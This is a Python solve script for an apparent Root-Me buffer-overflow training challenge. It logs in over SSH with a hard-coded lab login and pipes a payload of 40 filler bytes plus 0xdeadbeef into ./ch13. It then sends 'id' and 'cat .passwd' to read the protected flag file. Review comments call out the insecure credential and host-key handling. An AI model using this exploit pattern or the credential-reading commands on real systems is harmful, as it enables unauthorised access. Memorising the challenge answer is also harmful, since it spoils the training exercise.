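#!/usr/bin/env python3
"""Solve script for a binary-exploitation training challenge, run over SSH.

The script logs in to the challenge host, pipes a fixed payload into the
``./ch13`` binary found in the login directory, then asks the remote side for
``id`` and the contents of ``.passwd`` and prints everything it receives.
"""
import time

import paramiko

# Connection details for the challenge host.
# NOTE(review): the password equals the user name, which looks like a published
# training login - confirm. Real credentials should never be hard-coded like
# this; read them from the environment or a secrets store instead.
HOST = "challenge02.root-me.org"
PORT = 2222
USER = "app-systeme-ch13"
PASSWORD = "app-systeme-ch13"


def drain(channel: paramiko.Channel, loops: int = 20, delay: float = 0.2) -> str:
    """Return the text the channel delivers over ``loops * delay`` seconds.

    Args:
        channel: Open interactive channel to read from.
        loops: Number of polling rounds.
        delay: Seconds to sleep before each round.

    Returns:
        Everything received, decoded as UTF-8 with undecodable bytes replaced.
    """
    received = bytearray()
    for _ in range(loops):
        time.sleep(delay)
        while channel.recv_ready():
            received += channel.recv(65535)
    # Decode once at the end: a multi-byte character split across two recv()
    # calls would otherwise be turned into replacement characters.
    return received.decode("utf-8", errors="replace")


def run() -> None:
    """Log in, feed the payload to ./ch13, and print the remote output."""
    client = paramiko.SSHClient()
    # Known hosts are verified against the user's known_hosts file; a changed
    # key for a host that is already known aborts the connection.
    client.load_system_host_keys()
    # AutoAddPolicy trusts any key presented by a host that is NOT yet known,
    # so a first connection is unauthenticated and the password goes to
    # whoever answers. Acceptable only for throwaway lab logins; pin the host
    # key (or use RejectPolicy) for anything else.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # connect() sits inside the try so the client is closed on failure too.
        client.connect(
            hostname=HOST, port=PORT, username=USER, password=PASSWORD, timeout=15
        )
        shell = client.invoke_shell()

        banner = drain(shell, loops=10)
        if banner:
            print(banner, end="")

        # Payload: 40 filler bytes followed by EF BE AD DE, i.e. 0xdeadbeef in
        # little-endian byte order. `cat` keeps stdin of ./ch13 open afterwards.
        # NOTE(review): the ch13 source is not part of this file; presumably it
        # reads stdin into a fixed-size buffer without a length check, the
        # defect class that a bounded read (buffer size passed to the read
        # call) eliminates.
        exploit = (
            '(python3 -c "import sys; '
            "sys.stdout.buffer.write(b'A'*40+b'\\xef\\xbe\\xad\\xde')\"; "
            "cat) | ./ch13\n"
        )
        shell.send(exploit.encode())
        print(drain(shell, loops=12), end="")

        shell.send(b"id\n")
        shell.send(b"cat .passwd\n")
        shell.send(b"exit\n")
        print(drain(shell, loops=20), end="")
    finally:
        client.close()


if __name__ == "__main__":
    run()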